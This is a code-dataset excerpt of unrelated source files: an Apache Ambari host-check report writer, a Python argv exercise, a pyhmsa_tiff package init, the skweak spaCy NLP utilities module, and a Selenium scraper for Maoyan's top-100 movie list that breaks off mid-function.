ambari-agent/src/main/python/ambari_agent/HostCheckReportFileHandler.py
|
mkozinenko/ambari
|
9cfe9559420a1f4af89a2d645af84b1ab20d6737
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
ambari-agent/src/main/python/ambari_agent/HostCheckReportFileHandler.py
|
mkozinenko/ambari
|
9cfe9559420a1f4af89a2d645af84b1ab20d6737
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import datetime
import os.path
import logging
import traceback
from AmbariConfig import AmbariConfig
import ConfigParser;
logger = logging.getLogger(__name__)
class HostCheckReportFileHandler:
HOST_CHECK_FILE = "hostcheck.result"
HOST_CHECK_CUSTOM_ACTIONS_FILE = "hostcheck_custom_actions.result"
def __init__(self, config=None):
self.hostCheckFilePath = None
if config is None:
config = self.resolve_ambari_config()
hostCheckFileDir = config.get('agent', 'prefix')
self.hostCheckFilePath = os.path.join(hostCheckFileDir, self.HOST_CHECK_FILE)
self.hostCheckCustomActionsFilePath = os.path.join(hostCheckFileDir, self.HOST_CHECK_CUSTOM_ACTIONS_FILE)
def resolve_ambari_config(self):
try:
config = AmbariConfig()
if os.path.exists(AmbariConfig.getConfigFile()):
config.read(AmbariConfig.getConfigFile())
else:
raise Exception("No config found, use default")
except Exception, err:
logger.warn(err)
return config
def writeHostChecksCustomActionsFile(self, structuredOutput):
if self.hostCheckCustomActionsFilePath is None:
return
try:
logger.info("Host check custom action report at " + self.hostCheckCustomActionsFilePath)
config = ConfigParser.RawConfigParser()
config.add_section('metadata')
config.set('metadata', 'created', str(datetime.datetime.now()))
if 'installed_packages' in structuredOutput.keys():
items = []
for itemDetail in structuredOutput['installed_packages']:
items.append(itemDetail['name'])
config.add_section('packages')
config.set('packages', 'pkg_list', ','.join(map(str, items)))
if 'existing_repos' in structuredOutput.keys():
config.add_section('repositories')
config.set('repositories', 'repo_list', ','.join(structuredOutput['existing_repos']))
self.removeFile(self.hostCheckCustomActionsFilePath)
self.touchFile(self.hostCheckCustomActionsFilePath)
with open(self.hostCheckCustomActionsFilePath, 'wb') as configfile:
config.write(configfile)
except Exception, err:
logger.error("Can't write host check file at %s :%s " % (self.hostCheckCustomActionsFilePath, err.message))
traceback.print_exc()
def writeHostCheckFile(self, hostInfo):
if self.hostCheckFilePath is None:
return
try:
logger.debug("Host check report at " + self.hostCheckFilePath)
config = ConfigParser.RawConfigParser()
config.add_section('metadata')
config.set('metadata', 'created', str(datetime.datetime.now()))
if 'existingUsers' in hostInfo.keys():
items = []
items2 = []
for itemDetail in hostInfo['existingUsers']:
items.append(itemDetail['name'])
items2.append(itemDetail['homeDir'])
config.add_section('users')
config.set('users', 'usr_list', ','.join(items))
config.set('users', 'usr_homedir_list', ','.join(items2))
if 'alternatives' in hostInfo.keys():
items = []
items2 = []
for itemDetail in hostInfo['alternatives']:
items.append(itemDetail['name'])
items2.append(itemDetail['target'])
config.add_section('alternatives')
config.set('alternatives', 'symlink_list', ','.join(items))
config.set('alternatives', 'target_list', ','.join(items2))
if 'stackFoldersAndFiles' in hostInfo.keys():
items = []
for itemDetail in hostInfo['stackFoldersAndFiles']:
items.append(itemDetail['name'])
if os.path.exists('/usr/hdp'):
items.append('/usr/hdp')
config.add_section('directories')
config.set('directories', 'dir_list', ','.join(items))
if 'hostHealth' in hostInfo.keys():
if 'activeJavaProcs' in hostInfo['hostHealth'].keys():
items = []
for itemDetail in hostInfo['hostHealth']['activeJavaProcs']:
items.append(itemDetail['pid'])
config.add_section('processes')
config.set('processes', 'proc_list', ','.join(map(str, items)))
self.removeFile(self.hostCheckFilePath)
self.touchFile(self.hostCheckFilePath)
with open(self.hostCheckFilePath, 'wb') as configfile:
config.write(configfile)
except Exception, err:
logger.error("Can't write host check file at %s :%s " % (self.hostCheckFilePath, err.message))
traceback.print_exc()
def removeFile(self, path):
if os.path.isfile(path):
logger.debug("Removing old host check file at %s" % path)
os.remove(path)
def touchFile(self, path):
if not os.path.isfile(path):
logger.debug("Creating host check file at %s" % path)
open(path, 'w').close()
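# Sketch of a resulting hostcheck.result file. Only the section and key names
# come from the writer above; the values are invented placeholders:
#   [metadata]
#   created = 2015-01-01 12:00:00.000000
#   [users]
#   usr_list = ambari,hdfs
#   usr_homedir_list = /home/ambari,/home/hdfs
#   [directories]
#   dir_list = /etc/hadoop,/usr/hdp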
| 36.657895
| 113
| 0.681981
|
794e44290f9e092e01df3fa24f59906f319aec35
| 264
|
py
|
Python
|
ex13.py
|
ShweYeeKoKo/python-exercises
|
f7e0a8a5b1a55c42783d36f849c10b54932d568e
|
[
"MIT"
] | null | null | null |
ex13.py
|
ShweYeeKoKo/python-exercises
|
f7e0a8a5b1a55c42783d36f849c10b54932d568e
|
[
"MIT"
] | null | null | null |
ex13.py
|
ShweYeeKoKo/python-exercises
|
f7e0a8a5b1a55c42783d36f849c10b54932d568e
|
[
"MIT"
] | null | null | null |
from sys import argv
# read the WYSS section for how to run this
script, first, second, third = argv
print("The script is called:", script)
print("Your first variable is:", first)
print("Your second variable is:", second)
print("Your third variable is:", third)
| 29.333333
| 43
| 0.731061
|
794e45aade7a6d16460934c64e28bb3e6e48c275
| 297
|
py
|
Python
|
pyhmsa_tiff/__init__.py
|
pyhmsa/pyhmsa-fileformat-tiff
|
e04bc393a899f45974ecee1e77afc78f0e48e6cb
|
[
"MIT"
] | null | null | null |
pyhmsa_tiff/__init__.py
|
pyhmsa/pyhmsa-fileformat-tiff
|
e04bc393a899f45974ecee1e77afc78f0e48e6cb
|
[
"MIT"
] | null | null | null |
pyhmsa_tiff/__init__.py
|
pyhmsa/pyhmsa-fileformat-tiff
|
e04bc393a899f45974ecee1e77afc78f0e48e6cb
|
[
"MIT"
] | null | null | null |
"""
Exporter of pyhMSA data to TIFF images.
"""
__author__ = "Philippe T. Pinard"
__email__ = "philippe.pinard@gmail.com"
__copyright__ = "Copyright (c) 2013-2015 Philippe T. Pinard"
__license__ = "MIT"
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 22.846154
| 60
| 0.750842
|
794e45c19b797eba9dec4876a0be74c2dcbaed05
| 26,964
|
py
|
Python
|
skweak/utils.py
|
schopra8/skweak
|
e2a8fd396164b07292d86fae44e71af0fa28860a
|
[
"MIT"
] | null | null | null |
skweak/utils.py
|
schopra8/skweak
|
e2a8fd396164b07292d86fae44e71af0fa28860a
|
[
"MIT"
] | null | null | null |
skweak/utils.py
|
schopra8/skweak
|
e2a8fd396164b07292d86fae44e71af0fa28860a
|
[
"MIT"
] | null | null | null |
import json
import re
import functools
from typing import List, Dict, Tuple, Optional, TypeVar, Iterable
from spacy.tokens import Doc, Token, Span, DocBin # type: ignore
import numpy as np
T = TypeVar('T')
############################################
# Utility functions for NLP analysis
############################################
def is_likely_proper(tok: Token, min_rank=200) -> bool:
"""Returns true if the spacy token is a likely proper name, based on its form.
NB: this method should only be used for languages that have a distinction between
lowercase and uppercase (so called bicameral scripts)."""
# We require at least two characters
if len(tok) < 2:
return False
# If the lemma is titled or in uppercase, just return True
elif tok.lemma_.istitle() and len(tok.lemma_) >2:
return True
elif tok.lemma_.isupper() and len(tok.lemma_) >2 and tok.lemma_ != "-PRON-":
return True
# If there is no lemma, but the token is in uppercase, return true as well
elif tok.lemma_=="" and tok.is_upper:
return True
    # We do not consider the 200 most common words as proper names
elif (tok.lemma_.islower() and tok.lemma in tok.vocab.strings
and tok.vocab[tok.lemma].rank < min_rank):
return False
# Handling cases such as iPad
elif len(tok) > 2 and tok.text[0].islower() and tok.text[1].isupper():
return True
# Handling cases such as IceFog
elif (len(tok) > 2 and tok.text[0].isupper()
and any([k.islower() for k in tok.text[1:]])
and any([k.isupper() for k in tok.text[1:]])):
return True
# Else, check whether the surface token is titled and is not sentence-initial
# NB: This should be commented out for languages such as German
elif (tok.i > 0 and tok.is_title and not tok.is_sent_start
and tok.nbor(-1).text not in {'\'', '"', '‘', '“', '”', '’', "\n", "|"}
and not tok.nbor(-1).text.endswith(".")):
return True
# If the part-of-speech is a proper noun
elif tok.pos_ == "PROPN":
return True
# If the token is a quite rare token
elif (len(tok) > 3 and (tok.is_lower or tok.is_upper)
and len(tok.vocab.vectors) > 0 and tok.is_oov):
return True
return False
def is_infrequent(span: Span, max_rank_threshold=15000) -> bool:
"""Returns true if there is at least one token that is quite infrequent"""
max_rank = max(tok.rank if len(span.vocab.vectors) >
0 and tok.rank > 0 else 0 for tok in span)
return max_rank > max_rank_threshold
def in_compound(tok: Token):
"""Returns true if the spacy token is part of a compound phrase"""
if tok.dep_ == "compound":
return True
elif tok.i > 0 and tok.nbor(-1).dep_ == "compound":
return True
return False
def replace_ner_spans(doc: Doc, source: str):
"""Given a Spacy Doc object and the name of an annotation source, replaces
the current named entities by the ones specified in the source"""
# We create Spacy spans based on the annotation layer
spans = []
if source in doc.spans:
for span in doc.spans[source]:
spans.append(span)
doc.ents = tuple(spans)
return doc
@functools.lru_cache(maxsize=5)
def get_spacy_model(spacy_model_name: str):
"""Returns the vocabulary associated with the spacy model
(and caches it for faster access)"""
import spacy
return spacy.load(spacy_model_name)
@functools.lru_cache(maxsize=1)
def get_tokens(doc: Doc) -> List[str]:
"""Returns the list of tokens from a given spacy Document. As it is an
operation that (for some strange reason) actually takes some CPU resources,
we cache the results, as it is a frequent operation, e.g. for gazetteers. """
return [tok.text for tok in doc]
@functools.lru_cache(maxsize=1)
def get_next_sentence_boundaries(doc: Doc) -> List[int]:
"""Returns a list of integers (of same size as the number of tokens)
expressing, for each token, the position of the next sentence boundary
(start-of-sentence token). """
boundaries = []
for tok in doc:
if tok.is_sent_start:
boundaries.append(tok.i)
next_boundary_indices = np.searchsorted(boundaries, range(1, len(doc)+1))
next_boundaries = [boundaries[i] if i < len(boundaries) else len(doc)
for i in next_boundary_indices]
return next_boundaries
############################################
# I/O related functions
############################################
def docbin_reader(docbin_file_path: str, spacy_model_name: str = "en_core_web_md",
cutoff: Optional[int] = None, nb_to_skip: int = 0):
"""Read a binary file containing a DocBin repository of spacy documents.
In addition to the file path, we also need to provide the name of the spacy
model (which is necessary to load the vocabulary), such as "en_core_web_md".
If cutoff is specified, the method will stop after generating the given
number of documents. If nb_to_skip is > 0, the method will skip the given
number of documents before starting the generation.
"""
import spacy
# Reading the binary data from the file
fd = open(docbin_file_path, "rb")
data = fd.read()
fd.close()
docbin = DocBin(store_user_data=True)
docbin.from_bytes(data)
del data
# print("Total number of documents in docbin:", len(docbin))
# Skip a number of documents
if nb_to_skip:
docbin.tokens = docbin.tokens[nb_to_skip:]
docbin.spaces = docbin.spaces[nb_to_skip:]
docbin.user_data = docbin.user_data[nb_to_skip:]
# Retrieves the vocabulary
vocab = get_spacy_model(spacy_model_name).vocab
# We finally generate the documents one by one
reader = docbin.get_docs(vocab)
for i, doc in enumerate(reader):
yield doc
if cutoff is not None and (i+1) >= cutoff:
return
def docbin_writer(docs: Iterable[Doc], docbin_output_path: str):
"""Writes a stream of Spacy Doc objects to a binary file in the DocBin format."""
import spacy.attrs
# Creating the DocBin object (with all attributes)
attrs = [spacy.attrs.LEMMA, spacy.attrs.TAG, spacy.attrs.DEP, spacy.attrs.HEAD,
spacy.attrs.ENT_IOB, spacy.attrs.ENT_TYPE]
docbin = DocBin(attrs=attrs, store_user_data=True)
# Storing the documents in the DocBin repository
for doc in docs:
doc.cats = {}
docbin.add(doc)
data = docbin.to_bytes()
# And writing the content to the file
print("Write to", docbin_output_path, end="...", flush=True)
fd = open(docbin_output_path, "wb")
fd.write(data)
fd.close()
print("done")
def json_writer(docs, json_file_path: str, source: str = None):
"""Converts a collection of Spacy Doc objects to a JSON format,
such that it can be used to train the Spacy NER model. (for Spacy v2)
Source must be an aggregated source (defined in user_data["agg_spans"]), which
will correspond to the target values in the JSON file.
"""
import spacy
if int(spacy.__version__[0]) > 2:
raise RuntimeError("Only supported for Spacy v2")
import spacy.gold # type: ignore
# We start opening up the JSON file
print("Writing JSON file to", json_file_path)
out_fd = open(json_file_path, "wt")
out_fd.write("[{\"id\": 0, \"paragraphs\": [\n")
for i, doc in enumerate(docs):
# We replace the NER labels with the annotation source
if source is not None:
doc = replace_ner_spans(doc, source)
# We dump the JSON content to the file
d = spacy.gold.docs_to_json([doc])
s = json.dumps(d["paragraphs"]).strip("[]")
if i > 0:
s = ",\n" + s
out_fd.write(s)
if i > 0 and i % 1000 == 0:
print("Converted documents:", i)
out_fd.flush()
# And finally close all file descriptors
out_fd.write("]}]\n")
out_fd.flush()
out_fd.close()
############################################
# Operations on spans
############################################
def get_spans(doc: Doc, sources: List[str], labels: Optional[List[str]] = None
) -> List[Span]:
"""Return the spans annotated by a list of labelling sources. If two
spans are overlapping, the longest spans are kept. One can also specify the
labels to focus on (if empty, we extract all). """
# Creating a list of spans
spans = []
for source in sources:
if source in doc.spans:
for span in doc.spans[source]:
if labels is None or span.label_ in labels:
spans.append(span)
else:
raise RuntimeError("Annotation source \"%s\" cannot be found" % source)
# Remove possible overlaps
spans = _remove_overlaps(spans)
return spans
def get_spans_with_probs(doc: Doc, source: str, labels: Optional[List[str]] = None
) -> List[Tuple[Span,float]]:
"""Return the spans annotated by an aggregated source. The method returns a
dictionary of non-overlapping spans where the keys
are (start, end) pairs and the values are pairs of (label, prob).
"""
spans = []
if source in doc.spans:
for span in doc.spans[source]:
if labels is None or span.label_ in labels:
prob = _get_agg_span_prob(doc, source, span)
spans.append((span, prob))
else:
raise RuntimeError("Annotation source \"%s\" cannot be found" % source)
return spans
def _get_agg_span_prob(doc, source, span):
"""Get the probability that the source assigns the (start,end)->label span"""
if source not in doc.spans:
return 0
elif "probs" not in doc.spans[source].attrs:
return 1
probs = doc.spans[source].attrs["probs"]
if (span.start, span.end) in probs:
return probs[(span.start, span.end)]
probs_per_token = []
for i in range(span.start, span.end):
if i in probs:
for prefixed_label, prob in probs[i].items():
if prefixed_label.endswith("-%s" % span.label_):
probs_per_token.append(prob)
return sum(probs_per_token)/(len(span))
def count_nb_occurrences(tokens: Tuple[str, ...], all_tokens: List[str]):
"""Count the number of occurences of the sequence of tokens in the
full list all_tokens"""
nb_occurrences = 0
for i in range(len(all_tokens)):
for k in range(len(tokens)):
            if (i+k) >= len(all_tokens) or all_tokens[i+k] != tokens[k]:
break
else:
nb_occurrences += 1
return nb_occurrences
def at_least_nb_occurrences(tokens: Tuple[str, ...], all_tokens: List[str], min_threshold):
"""Returns true if the number of occurences of the sequence of tokens in the
full list all_tokens is at least min_threshold, and false otherwise"""
if len(tokens) == 1:
return all_tokens.count(tokens[0]) >= min_threshold
nb_occurrences = 0
for i in range(len(all_tokens)):
for k in range(len(tokens)):
if (i+k) >= len(all_tokens) or all_tokens[i+k] != tokens[k]:
break
else:
nb_occurrences += 1
if nb_occurrences >= min_threshold:
return True
return False
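# Illustrative behaviour of the two helpers above (hypothetical token lists):
#   count_nb_occurrences(("New", "York"), ["New", "York", "is", "New", "York"]) -> 2
#   at_least_nb_occurrences(("New", "York"), ["New", "York", "is", "New", "York"], 2) -> True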
def _remove_overlaps(spans: List[Span]) -> List[Span]:
"""Remove overlaps between spans expressed as (start, end, label, score)
tuples. When two overlapping spans are detected, the method keeps the
longest span and removes the other. If the two scores are identical,
the first span is discarded).
"""
# We sort the spans by their position
spans.sort()
# We resolve overlaps between spans
finished = False
while not finished:
finished = True
for i in range(1, len(spans)):
# If two spans are overlapping , keep the longest one
start1 = spans[i-1].start
end1 = spans[i-1].end
start2 = spans[i].start
end2 = spans[i].end
if start2 < end1 and start1 < end2:
length_diff = (end1-start1) - (end2-start2)
if length_diff > 0:
del spans[i]
else:
del spans[i-1]
finished = False
break
return spans
def merge_contiguous_spans(spans: List[Tuple[int, int, str]], doc: Doc,
acceptable_gaps: str = ","):
"""Merge spans that are contiguous (and with same label), or only
separated with some predefined punctuation symbols"""
finished = False
while not finished:
finished = True
spans.sort()
for i in range(1, len(spans)):
start1, end1, label1 = spans[i-1]
start2, end2, label2 = spans[i]
if end1 == start2 or (end1 == start2-1 and doc[end1].text in acceptable_gaps):
if label1 == label2:
new_spans = spans[:i-1] if i > 1 else []
new_spans.append((start1, end2, label1))
new_spans += spans[i+1:]
spans = new_spans
finished = False
break
return spans
def get_overlaps(start: int, end: int, other_spans: List[Tuple[int, int]]) -> List[Tuple[int, int]]:
"""Returns a list of overlaps (as (start, end, value) between the provided span
and other existing spans"""
overlaps = []
other_spans.sort()
start_search, end_search = _binary_search(start, end, other_spans)
for other_span_start, other_span_end in other_spans[start_search:end_search]:
if start < other_span_start and end > other_span_end:
overlaps.append((other_span_start, other_span_end))
return overlaps
def _binary_search(start: int, end: int, intervals: List[Tuple[int, int]]) -> Tuple[int, int]:
"""Performs a binary search"""
start_search = 0
end_search = len(intervals)
while start_search < (end_search-1):
mid = start_search + (end_search-start_search)//2
(interval_start, interval_end) = intervals[mid]
if interval_end <= start:
start_search = mid
elif interval_start >= end:
end_search = mid
else:
break
return start_search, end_search
def get_subsequences(sequence: List[T]) -> List[List[T]]:
"""Returns the list of possible subsequences that are included
in the full sequence (including the original sequence)."""
subsequences = []
for length in range(1, len(sequence)+1):
for i in range(length, len(sequence)+1):
subsequences.append(sequence[i-length:i])
return subsequences
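# Illustrative enumeration order (shortest subsequences first):
#   get_subsequences([1, 2, 3]) -> [[1], [2], [3], [1, 2], [2, 3], [1, 2, 3]]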
def spans_to_array(doc: Doc, labels: List[str],
sources: List[str] = None) -> np.ndarray:
"""Convert the annotations of a spacy document into a 2D array.
Each row corresponds to a token, and each column to a labelling
source. In other words, the value at (i,j) represents the prediction
of source j for token i. This prediction is expressed as the
index of the label in the labels.
Labels must be a list of labels (such as B-PERSON, I-ORG) to detect.
Sources should be a list of labelling sources. If empty, all sources
are employed.
NB: we assume the labels use either IO/BIO/BILUO, and that the
O label is at position 0.
"""
# Creating some helper dictionaries
label_indices = {}
prefixes = set()
labels_without_prefix = set()
for i, label in enumerate(labels):
label_indices[label] = i
if "-" in label:
prefix, label = label.split("-", 1)
prefixes.add(prefix)
labels_without_prefix.add(label)
if sources is None:
sources = list(doc.spans.keys())
# Creating the numpy array itself
data = np.zeros((len(doc), len(sources)), dtype=np.int16)
for source_index, source in enumerate(sources):
for span in doc.spans.get(source, []):
if span.label_ not in labels_without_prefix:
continue
# If the span is a single token, we can use U
if "U" in prefixes and len(span) == 1:
data[span.start, source_index] = label_indices["U-%s" % span.label_]
continue
# Otherwise, we use B, I and L
if "B" in prefixes:
data[span.start, source_index] = label_indices["B-%s" % span.label_]
if "I" in prefixes:
start_i = (span.start+1) if "B" in prefixes else span.start
end_i = (span.end-1) if "L" in prefixes else span.end
data[start_i:end_i, source_index] = label_indices["I-%s" % span.label_]
if "L" in prefixes:
data[span.end-1, source_index] = label_indices["L-%s" % span.label_]
return data
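# Illustrative sketch (assumed BILU label inventory, not taken from the module):
#   labels = ["O", "B-PER", "I-PER", "L-PER", "U-PER"]
#   If one labelling source marks doc[1:3] as PER, the returned column for that
#   source is [0, 1, 3, 0, ...]: B-PER on the first token of the span,
#   L-PER on its last token, and O (index 0) everywhere else.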
def token_array_to_spans(agg_array: np.ndarray,
prefix_labels: List[str]) -> Dict[Tuple[int, int], str]:
"""Returns an dictionary of spans corresponding to the aggregated 2D
array. prefix_labels must be list of prefix labels such as B-PERSON,
I-ORG etc., of same size as the number of columns in the array."""
spans = {}
i = 0
while i < len(agg_array):
if np.isscalar(agg_array[i]):
value_index = agg_array[i]
else: # If we have probabilities, select most likely label
value_index = agg_array[i].argmax()
if value_index == 0:
i += 1
continue
prefix_label = prefix_labels[value_index]
prefix, label = prefix_label.split("-", 1)
# If the prefix is "U", create a single-token span
if prefix == "U":
spans[(i, i+1)] = label
i += 1
# Otherwise, we need to continue until the span ends
elif prefix in {"B", "I"}:
start = i
i += 1
while i < len(agg_array):
if np.isscalar(agg_array[i]):
next_val = agg_array[i]
else:
next_val = agg_array[i].argmax()
if next_val == 0:
break
next_prefix_label = prefix_labels[next_val]
next_prefix, next_label = next_prefix_label.split("-", 1)
if next_prefix not in {"I", "L"}:
break
i += 1
spans[(start, i)] = label
return spans
def token_array_to_probs(agg_array: np.ndarray,
prefix_labels: List[str]) -> Dict[int, Dict[str, float]]:
"""Given a 2D array containing, for each token, the probabilities for a
each possible output label in prefix form (B-PERSON, I-ORG, etc.), returns
a dictionary of dictionaries mapping token indices to probability distributions
over their possible labels. The "O" label and labels with zero probabilities
are ignored.
"""
# Initialising the label sequence
token_probs = {}
# We only look at labels beyond "O", and with non-zero probability
row_indices, col_indices = np.nonzero(agg_array[:, 1:])
for i, j in zip(row_indices, col_indices):
if i not in token_probs:
token_probs[i] = {prefix_labels[j+1]: agg_array[i, j+1]} #type: ignore
else:
token_probs[i][prefix_labels[j+1]] = agg_array[i, j+1] #type: ignore
return token_probs
def is_valid_start(prefix_label, encoding="BIO"):
"""Returns whether the prefix label is allowed to start a sequence"""
return (prefix_label == "O"
or prefix_label.startswith("B-")
or prefix_label.startswith("U-") or
(prefix_label.startswith("I-") and "B" not in encoding))
def is_valid_transition(prefix_label1, prefix_label2, encoding="BIO"):
"""Returns whether the two labels (associated with a prefix, such as B-PERSON,
I-ORG etc.) are allowed to follow one another according to the encoding (which
can be BIO, BILUO, IO, etc.)"""
if prefix_label1.startswith("B-"):
if ((prefix_label2.startswith("I-")
or prefix_label2.startswith("L-"))
and prefix_label1[2:] == prefix_label2[2:]):
return True
elif "U" not in encoding:
return (prefix_label2 == "O"
or prefix_label2.startswith("B-")
or prefix_label2.startswith("U-")
or (prefix_label2.startswith("I-") and "B" not in encoding))
elif prefix_label1.startswith("I-"):
if ((prefix_label2.startswith("I-")
or prefix_label2.startswith("L-"))
and prefix_label1[2:] == prefix_label2[2:]):
return True
elif "L" not in encoding:
return (prefix_label2 == "O"
or prefix_label2.startswith("B-")
or prefix_label2.startswith("U-")
or (prefix_label2.startswith("I-") and "B" not in encoding))
elif prefix_label1 == "O" or prefix_label1.startswith("L-") or prefix_label1.startswith("U-"):
return (prefix_label2 == "O"
or prefix_label2.startswith("B-")
or prefix_label2.startswith("U-")
or (prefix_label2.startswith("I-") and "B" not in encoding))
############################################
# Visualisation
############################################
def display_entities(doc: Doc, layer=None, add_tooltip=False):
"""Display the entities annotated in a spacy document, based on the
provided annotation layer(s). If layer is None, the method displays
the entities from Spacy.
This method will only work in a Jupyter Notebook or similar.
If add_tooltip is set to True, the visualisation also adds tooltips to show
the predictions of each labelling functions for a given token. This functionality
only works with Jupyter Lab (not Jupyter Notebook).
"""
import spacy.displacy
import IPython.core.display
if layer is None:
spans = doc.ents
elif type(layer) is list:
spans = get_spans(doc, layer)
elif type(layer) == str:
if "*" in layer:
matched_layers = [l for l in doc.spans
if re.match(layer.replace("*", ".*?")+"$", l)]
spans = get_spans(doc, matched_layers)
else:
spans = doc.spans[layer]
else:
raise RuntimeError("Layer type not accepted")
entities = {}
for span in spans:
start_char = doc[span.start].idx
end_char = doc[span.end-1].idx + len(doc[span.end-1])
if (start_char, end_char) not in entities:
entities[(start_char, end_char)] = span.label_
# If we have several alternative labels for a span, join them with +
elif span.label_ not in entities[(start_char, end_char)]:
entities[(start_char, end_char)] = entities[(
start_char, end_char)] + "+" + span.label_
entities = [{"start": start, "end": end, "label": label}
for (start, end), label in entities.items()]
doc2 = {"text": doc.text, "title": None, "ents": entities}
html = spacy.displacy.render(doc2, jupyter=False, style="ent", manual=True)
if add_tooltip and type(layer)==str and "sources" in doc.spans[layer].attrs:
html = _enrich_with_tooltip(doc, html, doc.spans[layer].attrs["sources"]) # type: ignore
ipython_html = IPython.core.display.HTML(
'<span class="tex2jax_ignore">{}</span>'.format(html))
return IPython.core.display.display(ipython_html)
def _enrich_with_tooltip(doc: Doc, html: str, sources: List[str]):
"""Enrich the HTML produced by spacy with tooltips displaying the predictions
of each labelling function"""
import spacy.util
if len(doc.spans)==0:
return html
# Retrieves annotations for each token
annotations_by_tok = {}
for source in sources:
for span in doc.spans[source]:
for i in range(span.start, span.end):
annotations_by_tok[i] = annotations_by_tok.get(i, []) + [(source, span.label_)]
# We determine which characters are part of the HTML markup and not the text
all_chars_to_skip = set()
for fragment in re.finditer("<span.+?</span>", html):
all_chars_to_skip.update(range(fragment.start(0), fragment.end(0)))
for fragment in re.finditer("</?div.*?>", html):
all_chars_to_skip.update(range(fragment.start(0), fragment.end(0)))
for fragment in re.finditer("</?mark.*?>", html):
all_chars_to_skip.update(range(fragment.start(0), fragment.end(0)))
# We loop on each token
curr_pos = 0
new_fragments = []
for tok in doc:
# We search for the token position in the HTML
toktext = spacy.util.escape_html(tok.text)
if "\n" in toktext:
continue
start_pos = html.index(toktext, curr_pos)
if start_pos == -1:
raise RuntimeError("could not find", tok)
while any((i in all_chars_to_skip for i in range(start_pos, start_pos + len(toktext)))):
start_pos = html.index(toktext, start_pos+1)
if start_pos == -1:
raise RuntimeError("could not find", tok)
# We add the preceding fragment
new_fragments.append(html[curr_pos:start_pos])
# If the token has annotations, we create a tooltip
if tok.i in annotations_by_tok:
lines = ["%s:\t%s  " %
(ann, label) for ann, label in annotations_by_tok[tok.i]]
max_width = 7*max([len(l) for l in lines])
new_fragment = ("<label class='tooltip'>%s" % toktext +
"<span class='tooltip-text' style='width:%ipx'>"%max_width +
"%s</span></label>" %"<br>".join(lines))
else:
new_fragment = toktext
new_fragments.append(new_fragment)
curr_pos = start_pos + len(toktext)
new_fragments.append(html[curr_pos:])
new_html = """<style>
.tooltip { position: relative; border-bottom: 1px dotted black; }
.tooltip .tooltip-text {visibility: hidden; background-color: black; color: white;
line-height: 1.2; text-align: right; border-radius: 6px;
padding: 5px 0; position: absolute; z-index: 1; margin-left:1em;
opacity: 0; transition: opacity 1s;}
.tooltip .tooltip-text::after {position: absolute; top: 1.5em; right: 100%; margin-top: -5px;
border-width: 5px; border-style: solid;
border-color: transparent black transparent transparent;}
.tooltip:hover .tooltip-text {visibility: visible; opacity: 1;}
</style>
""" + "".join(new_fragments)
return new_html
| 36.339623
| 100
| 0.608812
|
794e45cdcb0ddec582bbd5bcba4917956e5f1d35
| 3,715
|
py
|
Python
|
code/crawler/selenium_maoyan_movie_top100.py
|
yuguiyang/python_demo
|
1be2406bfc920e22a0f92bf10d9a3665984067ba
|
[
"Apache-2.0"
] | null | null | null |
code/crawler/selenium_maoyan_movie_top100.py
|
yuguiyang/python_demo
|
1be2406bfc920e22a0f92bf10d9a3665984067ba
|
[
"Apache-2.0"
] | null | null | null |
code/crawler/selenium_maoyan_movie_top100.py
|
yuguiyang/python_demo
|
1be2406bfc920e22a0f92bf10d9a3665984067ba
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import csv
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
# Open the browser
browser = webdriver.Firefox()
# Set up an explicit wait of at most 10 seconds
wait = WebDriverWait(browser,10)
# Global counter for the movie ranking
comment_index = 0
# Define a Movie class
class Movie:
__movie_id = 0
__movie_name = ''
__movie_star = ''
__movie_releasetime = ''
__movie_score = ''
def __init__(self , movie_id,movie_name,movie_star,movie_releasetime,movie_score):
self.__movie_id = movie_id
self.__movie_name = movie_name
self.__movie_star = movie_star
self.__movie_releasetime = movie_releasetime
self.__movie_score = movie_score
def show(self):
print('影片排名: ', self.__movie_id)
print('影片名称: ', self.__movie_name)
print(self.__movie_star)
print(self.__movie_releasetime)
print('影片评分', self.__movie_score)
print('')
def simple_list(self):
return [self.__movie_id, self.__movie_name, self.__movie_star, self.__movie_releasetime, self.__movie_score]
def save2csv(movie_list):
with open('movie.csv', 'a', newline='',encoding='utf-8') as csvfile:
csv_writer = csv.writer(csvfile)
for m in movie_list:
csv_writer.writerow(m.simple_list())
csvfile.close()
def main():
    # Open the URL
browser.get('http://maoyan.com/board/4')
    # Print the browser title
print('browser title: ',browser.title)
    # Data-update information shown on the page
p_update_info = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.main p.update-time')))
print('更新信息: ',p_update_info.text)
    # Show the information of the current page
show_current_page()
def show_current_page():
print('-----------------------------------')
print('current url: ',browser.current_url)
    # Get the current page indicator
div_page = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.pager-main li.active')))
print('current page: ',div_page.text)
    # Total number of items on the current page
div_items = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR,'div.main div.board-item-main div.board-item-content')))
print('total count: ',len(div_items))
movie_list = []
    # The result set contains many entries; iterate over them
for item in div_items:
        # Use the global counter
global comment_index
comment_index += 1
        # Extract the fields we need
p_name = item.find_element_by_css_selector('div.movie-item-info p.name')
p_star = item.find_element_by_css_selector('div.movie-item-info p.star')
p_releasetime = item.find_element_by_css_selector('div.movie-item-info p.releasetime')
p_score_integer = item.find_element_by_css_selector('div.movie-item-number p.score i.integer')
p_score_fraction = item.find_element_by_css_selector('div.movie-item-number p.score i.fraction')
        # Build the Movie object
m = Movie(comment_index , p_name.text , p_star.text, p_releasetime.text, p_score_integer.text+p_score_fraction.text)
movie_list.append(m)
save2csv(movie_list)
    # Fetch the next page
show_next_page()
def show_next_page():
try:
        # Find the "next page" (下一页) link;
